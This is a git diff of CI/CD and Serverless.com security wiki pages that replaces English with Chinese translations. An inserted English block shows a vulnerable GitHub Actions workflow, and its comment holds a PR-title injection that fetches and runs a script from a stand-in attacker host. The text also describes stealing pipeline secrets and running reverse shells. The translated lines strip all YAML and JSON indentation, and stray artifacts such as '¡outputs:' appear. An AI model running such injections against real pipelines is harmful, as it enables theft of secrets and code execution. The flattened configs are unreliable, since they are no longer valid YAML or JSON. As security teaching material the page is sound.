This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\ -These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code. +定义管道的最常见方法是使用 **托管在仓库中的 CI 配置文件**。该文件描述了执行作业的顺序、影响流程的条件和构建环境设置。\ +这些文件通常具有一致的名称和格式,例如 — Jenkinsfile(Jenkins)、.gitlab-ci.yml(GitLab)、.circleci/config.yml(CircleCI)和位于 .github/workflows 下的 GitHub Actions YAML 文件。当触发时,管道作业 **从选定的源中拉取代码**(例如提交/分支),并 **根据 CI 配置文件中指定的命令** 对该代码执行操作。 -Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**. +因此,攻击者的最终目标是以某种方式 **妥协这些配置文件** 或 **它们执行的命令**。 ### PPE - Poisoned Pipeline Execution -The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands. +毒化管道执行(PPE)路径利用 SCM 仓库中的权限来操纵 CI 管道并执行有害命令。具有必要权限的用户可以修改 CI 配置文件或管道作业使用的其他文件,以包含恶意命令。这会“毒化” CI 管道,导致这些恶意命令的执行。 -For a malicious actor to be successful performing a PPE attack he needs to be able to: +为了使恶意行为者成功执行 PPE 攻击,他需要能够: -- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). - - Note that sometimes an **external PR count as "write access"**. -- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. - - For this, he might need to be able to **bypass branch protections**. +- 拥有 **对 VCS 平台的写入访问权限**,因为通常在执行推送或拉取请求时会触发管道。(查看 VCS 渗透测试方法以获取获取访问权限的摘要)。 +- 注意,有时 **外部 PR 计入“写入访问”**。 +- 即使他拥有写入权限,他也需要确保他可以 **修改 CI 配置文件或其他配置所依赖的文件**。 +- 为此,他可能需要能够 **绕过分支保护**。 -There are 3 PPE flavours: +有 3 种 PPE 风格: -- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. -- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). -- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. - - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. 
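To make the **3PE Command Injection** case concrete, here is a hedged sketch of a vulnerable workflow step (GitHub Actions syntax; the workflow and step names are invented for illustration). The PR title is expanded into the shell command text before the shell ever runs, so a crafted title injects arbitrary commands:

```yaml
# Hypothetical vulnerable job triggered by external PRs
on: pull_request_target   # runs in the context of the base repo (with its secrets)
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Log the PR title
        # ${{ ... }} is substituted before the shell parses the line, so a PR titled
        #   x"; curl https://attacker.example/x.sh | sh; echo "
        # ends up executing attacker-controlled commands on the runner
        run: echo "New PR: ${{ github.event.pull_request.title }}"
```

The usual fix is to pass any attacker-controllable value through an intermediate environment variable (an `env:` entry) and reference it as `"$TITLE"`, so it is never interpolated into the script text itself.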
+- **D-PPE**:**直接 PPE** 攻击发生在行为者 **修改将要执行的 CI 配置** 文件时。 +- **I-DDE**:**间接 PPE** 攻击发生在行为者 **修改** CI 配置文件所 **依赖的文件**(如 make 文件或 terraform 配置)时。 +- **公共 PPE 或 3PE**:在某些情况下,管道可以 **由没有写入访问权限的用户触发**(而且可能甚至不是组织的一部分),因为他们可以发送 PR。 +- **3PE 命令注入**:通常,CI/CD 管道会 **设置环境变量**,其中包含 **有关 PR 的信息**。如果该值可以被攻击者控制(如 PR 的标题),并且在 **危险位置**(如执行 **sh 命令**)中 **使用**,攻击者可能会 **在其中注入命令**。 ### Exploitation Benefits -Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation: +了解毒化管道的 3 种风格后,让我们检查攻击者在成功利用后可能获得的内容: -- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. - - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. -- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. - - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. - - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. - - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. - - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. -- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. +- **秘密**:如前所述,管道的作业需要 **特权**(检索代码、构建、部署……),这些特权通常在秘密中 **授予**。这些秘密通常可以通过 **环境变量或系统内的文件** 访问。因此,攻击者总是会尝试提取尽可能多的秘密。 +- 根据管道平台,攻击者 **可能需要在配置中指定秘密**。这意味着如果攻击者无法修改 CI 配置管道(例如 **I-PPE**),他可能 **只能提取该管道拥有的秘密**。 +- **计算**:代码在某处执行,具体取决于执行的位置,攻击者可能能够进一步转移。 +- **本地**:如果管道在本地执行,攻击者可能会进入 **具有更多资源的内部网络**。 +- **云**:攻击者可以访问 **云中的其他机器**,还可以 **提取** IAM 角色/服务帐户 **令牌** 以获得 **进一步的云内部访问**。 +- **平台机器**:有时作业将在 **管道平台机器** 内执行,这些机器通常位于 **没有更多访问权限** 的云中。 +- **选择它**:有时 **管道平台将配置多个机器**,如果您可以 **修改 CI 配置文件**,则可以 **指示要运行恶意代码的位置**。在这种情况下,攻击者可能会在每台可能的机器上运行反向 shell,以尝试进一步利用。 +- **妥协生产**:如果您在管道内部,并且最终版本是从中构建和部署的,您可能会 **妥协将要在生产中运行的代码**。 ## More relevant info ### Tools & CIS Benchmark -- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. 
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) 是一个开源工具,用于审计您的软件供应链堆栈的安全合规性,基于新的 [**CIS 软件供应链基准**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf)。审计集中在整个 SDLC 过程中,可以揭示从代码时间到部署时间的风险。 ### Top 10 CI/CD Security Risk -Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) +查看这篇关于 Cider 的前 10 大 CI/CD 风险的有趣文章:[**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) ### Labs -- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it -- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) +- 在每个平台上,您可以本地运行,您将找到如何本地启动它,以便您可以根据需要进行配置以进行测试 +- Gitea + Jenkins 实验室:[https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) ### Automatic Tools -- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. +- [**Checkov**](https://github.com/bridgecrewio/checkov):**Checkov** 是一个用于基础设施即代码的静态代码分析工具。 ## References - [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md index bf1343702..a608574f4 100644 --- a/src/pentesting-ci-cd/serverless.com-security.md +++ b/src/pentesting-ci-cd/serverless.com-security.md @@ -2,302 +2,273 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -### Organization +### 组织 -An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications. +一个 **组织** 是 Serverless Framework 生态系统中的最高级别实体。它代表一个 **集体团体**,例如公司、部门或任何大型实体,涵盖多个项目、团队和应用程序。 -### Team +### 团队 -The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings. +**团队** 是在组织内有访问权限的用户。团队根据角色帮助组织成员。**`合作者`** 可以查看和部署现有应用,而 **`管理员`** 可以创建新应用并管理组织设置。 -### Application +### 应用程序 -An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality. +一个 **应用** 是组织内相关服务的逻辑分组。它代表一个完整的应用程序,由多个无服务器服务组成,这些服务协同工作以提供一致的功能。 -### **Services** - -A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables. 
+### **服务** +一个 **服务** 是无服务器应用程序的核心组件。它代表您的整个无服务器项目,封装了所需的所有功能、配置和资源。它通常在 `serverless.yml` 文件中定义,服务包括元数据,如服务名称、提供者配置、功能、事件、资源、插件和自定义变量。 ```yaml service: my-service provider: - name: aws - runtime: nodejs14.x +name: aws +runtime: nodejs14.x functions: - hello: - handler: handler.hello +hello: +handler: handler.hello ``` -
Function -A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events. - -It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings. +一个 **Function** 代表一个单一的无服务器函数,例如 AWS Lambda 函数。它包含响应事件时执行的代码。 +它在 `serverless.yml` 的 `functions` 部分下定义,指定处理程序、运行时、事件、环境变量和其他设置。 ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get +hello: +handler: handler.hello +events: +- http: +path: hello +method: get ``` -
-Event +事件 -**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed. - -Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more. +**事件** 是触发您无服务器函数的触发器。它们定义了函数应该如何以及何时执行。 +常见的事件类型包括 HTTP 请求、计划事件(cron 作业)、数据库事件、文件上传等。 ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - - schedule: - rate: rate(10 minutes) +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +- schedule: +rate: rate(10 minutes) ``` -
-Resource +资源 -**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles. - -They are specified under the `resources` section, often using CloudFormation syntax for AWS. +**资源** 允许您定义您的服务所依赖的额外云资源,例如数据库、存储桶或 IAM 角色。 +它们在 `resources` 部分下指定,通常使用 AWS 的 CloudFormation 语法。 ```yaml resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - TableName: my-table - AttributeDefinitions: - - AttributeName: id - AttributeType: S - KeySchema: - - AttributeName: id - KeyType: HASH - ProvisionedThroughput: - ReadCapacityUnits: 1 - WriteCapacityUnits: 1 +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +TableName: my-table +AttributeDefinitions: +- AttributeName: id +AttributeType: S +KeySchema: +- AttributeName: id +KeyType: HASH +ProvisionedThroughput: +ReadCapacityUnits: 1 +WriteCapacityUnits: 1 ``` -
-Provider +提供者 -The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider. - -It includes details like the runtime, region, stage, and credentials. +**Provider** 对象指定云服务提供商(例如,AWS、Azure、Google Cloud),并包含与该提供商相关的配置设置。 +它包括运行时、区域、阶段和凭据等详细信息。 ```yaml yamlCopy codeprovider: - name: aws - runtime: nodejs14.x - region: us-east-1 - stage: dev +name: aws +runtime: nodejs14.x +region: us-east-1 +stage: dev ``` -
-Stage and Region - -The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments. +阶段和区域 +阶段代表不同的环境(例如,开发、预发布、生产),您的服务可以在这些环境中部署。它允许进行特定于环境的配置和部署。 ```yaml provider: - stage: dev +stage: dev ``` - -The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations. - +区域指定了您的资源将要部署的地理区域。这对于延迟、合规性和可用性考虑非常重要。 ```yaml provider: - region: us-west-2 +region: us-west-2 ``` -
-Plugins - -**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm. +插件 +**插件** 通过添加新功能或与其他工具和服务集成来扩展 Serverless Framework 的功能。它们在 `plugins` 部分定义,并通过 npm 安装。 ```yaml plugins: - - serverless-offline - - serverless-webpack +- serverless-offline +- serverless-webpack ``` -
-Layers - -**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions. + +**层** 允许您将共享代码或依赖项单独打包和管理。这促进了可重用性并减少了部署包的大小。它们在 `layers` 部分下定义,并由函数引用。 ```yaml layers: - commonLibs: - path: layer-common +commonLibs: +path: layer-common functions: - hello: - handler: handler.hello - layers: - - { Ref: CommonLibsLambdaLayer } +hello: +handler: handler.hello +layers: +- { Ref: CommonLibsLambdaLayer } +``` +
+ +
+ +变量和自定义变量 + +**变量** 通过允许使用在部署时解析的占位符来实现动态配置。 + +- **语法:** `${variable}` 语法可以引用环境变量、文件内容或其他配置参数。 + +```yaml +functions: +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} +``` + +* **自定义变量:** `custom` 部分用于定义用户特定的变量和配置,这些变量和配置可以在 `serverless.yml` 中重复使用。 + +```yaml +custom: +tableName: my-dynamodb-table +stage: ${opt:stage, 'dev'} ```
-Variables and Custom Variables - -**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time. - -- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters. - - ```yaml - functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} - ``` - -* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`. - - ```yaml - custom: - tableName: my-dynamodb-table - stage: ${opt:stage, 'dev'} - ``` - -
- -
- -Outputs - -**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment. +输出 +**输出** 定义在服务部署后返回的值,例如资源 ARN、端点或其他有用信息。它们在 `outputs` 部分中指定,通常用于向其他服务公开信息或在部署后方便访问。 ```yaml ¡outputs: - ApiEndpoint: - Description: "API Gateway endpoint URL" - Value: - Fn::Join: - - "" - - - "https://" - - Ref: ApiGatewayRestApi - - ".execute-api." - - Ref: AWS::Region - - ".amazonaws.com/" - - Ref: AWS::Stage +ApiEndpoint: +Description: "API Gateway endpoint URL" +Value: +Fn::Join: +- "" +- - "https://" +- Ref: ApiGatewayRestApi +- ".execute-api." +- Ref: AWS::Region +- ".amazonaws.com/" +- Ref: AWS::Stage ``` -
-IAM Roles and Permissions - -**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions. +IAM角色和权限 +**IAM角色和权限** 定义了您函数和其他资源的安全凭证和访问权限。它们在 `provider` 或单个函数设置下进行管理,以指定必要的权限。 ```yaml provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +[...] +iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -
-Environment Variables - -**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions. +环境变量 +**变量** 允许您将配置设置和秘密传递给您的函数,而无需将它们硬编码。它们在提供者或单个函数的 `environment` 部分下定义。 ```yaml provider: - environment: - STAGE: ${self:provider.stage} +environment: +STAGE: ${self:provider.stage} functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} ``` -
-Dependencies - -**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`. +依赖 +**依赖** 管理您的函数所需的外部库和模块。它们通常通过像 npm 或 pip 这样的包管理器处理,并使用 `serverless-webpack` 等工具或插件与您的部署包捆绑在一起。 ```yaml plugins: - - serverless-webpack +- serverless-webpack ``` -
Hooks -**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments. - +**Hooks** 允许您在部署生命周期的特定时刻运行自定义脚本或命令。它们通过插件或在 `serverless.yml` 中定义,以在部署之前或之后执行操作。 ```yaml custom: - hooks: - before:deploy:deploy: echo "Starting deployment..." +hooks: +before:deploy:deploy: echo "Starting deployment..." ``` -
-### Tutorial +### 教程 -This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial): - -1. Create an AWS account (Serverless.com start in AWS infrastructure) -2. Create an account in serverless.com -3. Create an app: +这是官方教程的摘要 [**来自文档**](https://www.serverless.com/framework/docs/tutorial): +1. 创建一个 AWS 账户 (Serverless.com 在 AWS 基础设施上启动) +2. 在 serverless.com 创建一个账户 +3. 创建一个应用: ```bash # Create temp folder for the tutorial mkdir /tmp/serverless-tutorial @@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API) ## Create A New App ## Indicate a name like "tutorialapp) ``` - -This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function: +这应该创建了一个名为 **app** 的 `tutorialapp`,您可以在 [serverless.com](serverless.com-security.md) 中检查,并且创建了一个名为 `Tutorial` 的文件夹,其中包含文件 **`handler.js`**,该文件包含一些 JS 代码和 `helloworld` 代码,以及文件 **`serverless.yml`** 声明该函数: {{#tabs }} {{#tab name="handler.js" }} - ```javascript exports.hello = async (event) => { - return { - statusCode: 200, - body: JSON.stringify({ - message: "Go Serverless v4! Your function executed successfully!", - }), - } +return { +statusCode: 200, +body: JSON.stringify({ +message: "Go Serverless v4! Your function executed successfully!", +}), +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -342,130 +309,122 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x +name: aws +runtime: nodejs20.x functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get ``` - {{#endtab }} {{#endtabs }} -4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. - 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) - 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role. +4. 创建一个 AWS 提供者,进入 `https://app.serverless.com//settings/providers?providerId=new&provider=aws` 的 **仪表板**。 +1. 为了给 `serverless.com` 访问 AWS 的权限,它会要求运行一个 cloudformation 堆栈,使用这个配置文件(在撰写本文时):[https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) +2. 这个模板生成一个名为 **`SFRole-`** 的角色,具有 **`arn:aws:iam::aws:policy/AdministratorAccess`** 的权限,允许 `Serverless.com` AWS 账户访问该角色。
Yaml roleTemplate - ```yaml Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments. Resources: - SFRole: - Type: AWS::IAM::Role - Properties: - AssumeRolePolicyDocument: - Version: "2012-10-17" - Statement: - - Effect: Allow - Principal: - AWS: arn:aws:iam::486128539022:root - Action: - - sts:AssumeRole - Condition: - StringEquals: - sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" - Path: / - RoleName: !Ref RoleName - ManagedPolicyArns: - - arn:aws:iam::aws:policy/AdministratorAccess - ReporterFunction: - Type: Custom::ServerlessFrameworkReporter - Properties: - ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" - OrgUid: !Ref OrgUid - RoleArn: !GetAtt SFRole.Arn - Alias: !Ref Alias +SFRole: +Type: AWS::IAM::Role +Properties: +AssumeRolePolicyDocument: +Version: "2012-10-17" +Statement: +- Effect: Allow +Principal: +AWS: arn:aws:iam::486128539022:root +Action: +- sts:AssumeRole +Condition: +StringEquals: +sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" +Path: / +RoleName: !Ref RoleName +ManagedPolicyArns: +- arn:aws:iam::aws:policy/AdministratorAccess +ReporterFunction: +Type: Custom::ServerlessFrameworkReporter +Properties: +ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" +OrgUid: !Ref OrgUid +RoleArn: !GetAtt SFRole.Arn +Alias: !Ref Alias Outputs: - SFRoleArn: - Description: "ARN for the IAM Role used by Serverless Framework" - Value: !GetAtt SFRole.Arn +SFRoleArn: +Description: "ARN for the IAM Role used by Serverless Framework" +Value: !GetAtt SFRole.Arn Parameters: - OrgUid: - Description: Serverless Framework Org Uid - Type: String - Alias: - Description: Serverless Framework Provider Alias - Type: String - RoleName: - Description: Serverless Framework Role Name - Type: String +OrgUid: +Description: Serverless Framework Org Uid +Type: String +Alias: +Description: Serverless Framework Provider Alias +Type: String +RoleName: +Description: Serverless Framework Role Name +Type: String ``` -
-Trust Relationship - +信任关系 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::486128539022:root" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::486128539022:root" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" +} +} +} +] } ``` -
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas. +5. 教程要求创建文件 `createCustomer.js`,该文件基本上会创建一个由新 JS 文件处理的新 API 端点,并要求修改 `serverless.yml` 文件以生成一个 **新的 DynamoDB 表**,定义一个 **环境变量**,以及将使用生成的 lambdas 的角色。 {{#tabs }} {{#tab name="createCustomer.js" }} - ```javascript "use strict" const AWS = require("aws-sdk") module.exports.createCustomer = async (event) => { - const body = JSON.parse(Buffer.from(event.body, "base64").toString()) - const dynamoDb = new AWS.DynamoDB.DocumentClient() - const putParams = { - TableName: process.env.DYNAMODB_CUSTOMER_TABLE, - Item: { - primary_key: body.name, - email: body.email, - }, - } - await dynamoDb.put(putParams).promise() - return { - statusCode: 201, - } +const body = JSON.parse(Buffer.from(event.body, "base64").toString()) +const dynamoDb = new AWS.DynamoDB.DocumentClient() +const putParams = { +TableName: process.env.DYNAMODB_CUSTOMER_TABLE, +Item: { +primary_key: body.name, +email: body.email, +}, +} +await dynamoDb.put(putParams).promise() +return { +statusCode: 201, +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -475,388 +434,379 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x - environment: - DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} - iam: - role: - statements: - - Effect: "Allow" - Action: - - "dynamodb:PutItem" - - "dynamodb:Get*" - - "dynamodb:Scan*" - - "dynamodb:UpdateItem" - - "dynamodb:DeleteItem" - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +name: aws +runtime: nodejs20.x +environment: +DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} +iam: +role: +statements: +- Effect: "Allow" +Action: +- "dynamodb:PutItem" +- "dynamodb:Get*" +- "dynamodb:Scan*" +- "dynamodb:UpdateItem" +- "dynamodb:DeleteItem" +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get - createCustomer: - handler: createCustomer.createCustomer - events: - - httpApi: - path: / - method: post +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get +createCustomer: +handler: createCustomer.createCustomer +events: +- httpApi: +path: / +method: post resources: - Resources: - CustomerTable: - Type: AWS::DynamoDB::Table - Properties: - AttributeDefinitions: - - AttributeName: primary_key - AttributeType: S - BillingMode: PAY_PER_REQUEST - KeySchema: - - AttributeName: primary_key - KeyType: HASH - TableName: ${self:service}-customerTable-${sls:stage} +Resources: +CustomerTable: +Type: AWS::DynamoDB::Table +Properties: +AttributeDefinitions: +- AttributeName: primary_key +AttributeType: S +BillingMode: PAY_PER_REQUEST +KeySchema: +- AttributeName: primary_key +KeyType: HASH +TableName: ${self:service}-customerTable-${sls:stage} ``` - {{#endtab }} {{#endtabs }} -6. Deploy it running **`serverless deploy`** - 1. The deployment will be performed via a CloudFormation Stack - 2. Note that the **lambdas are exposed via API gateway** and not via direct URLs -7. **Test it** - 1. 
The previous step will print the **URLs** where your API endpoints lambda functions have been deployed +6. 部署它运行 **`serverless deploy`** +1. 部署将通过 CloudFormation Stack 执行 +2. 请注意,**lambdas 通过 API gateway 暴露,而不是通过直接 URL** +7. **测试它** +1. 上一步将打印出 **URLs**,您的 API 端点 lambda 函数已部署在这些地址 -## Security Review of Serverless.com +## Serverless.com 的安全审查 -### **Misconfigured IAM Roles and Permissions** +### **错误配置的 IAM 角色和权限** -Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation. +过于宽松的 IAM 角色可能会授予对云资源的未经授权访问,从而导致数据泄露或资源操控。 -When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like: +当没有为 Lambda 函数指定权限时,将创建一个仅具有生成日志权限的角色,如下所示:
-Minimum lambda permissions - +最低 lambda 权限 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Action": [ - "logs:CreateLogStream", - "logs:CreateLogGroup", - "logs:TagResource" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" - ], - "Effect": "Allow" - }, - { - "Action": ["logs:PutLogEvents"], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" - ], - "Effect": "Allow" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Action": [ +"logs:CreateLogStream", +"logs:CreateLogGroup", +"logs:TagResource" +], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" +], +"Effect": "Allow" +}, +{ +"Action": ["logs:PutLogEvents"], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" +], +"Effect": "Allow" +} +] } ``` -
